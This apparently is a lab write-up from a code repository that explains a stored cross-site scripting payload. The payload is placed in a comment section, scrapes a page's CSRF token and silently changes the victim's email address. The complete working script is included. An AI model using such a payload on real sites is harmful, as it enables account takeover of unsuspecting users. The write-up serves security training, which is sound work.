-
Notifications
You must be signed in to change notification settings - Fork 2
/
Exploiting XSS to perform CSRF.txt
37 lines (27 loc) · 1.25 KB
/
Exploiting XSS to perform CSRF.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Exploiting XSS to perform CSRF
No XSS popups this time, we're going for the silent XSS.
Again, the comment section can run JS code.
The code provided in the solution is very good, I'll just explain some parts that might not make sense:
req.open('get','/email',true);
req.send();
Sends a request to /email, where you can change your email address
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
Selects the response text from loading the comment page, selects the CSRF cookie and does a regex to pick the contents of the cookie. More here:
https://www.w3schools.com/Jsref/jsref_regexp_wordchar.asp
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
Send the request to change email with the stolen CSRF token and the desired new email address.
Script:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Just paste it in the comments and it should be enough.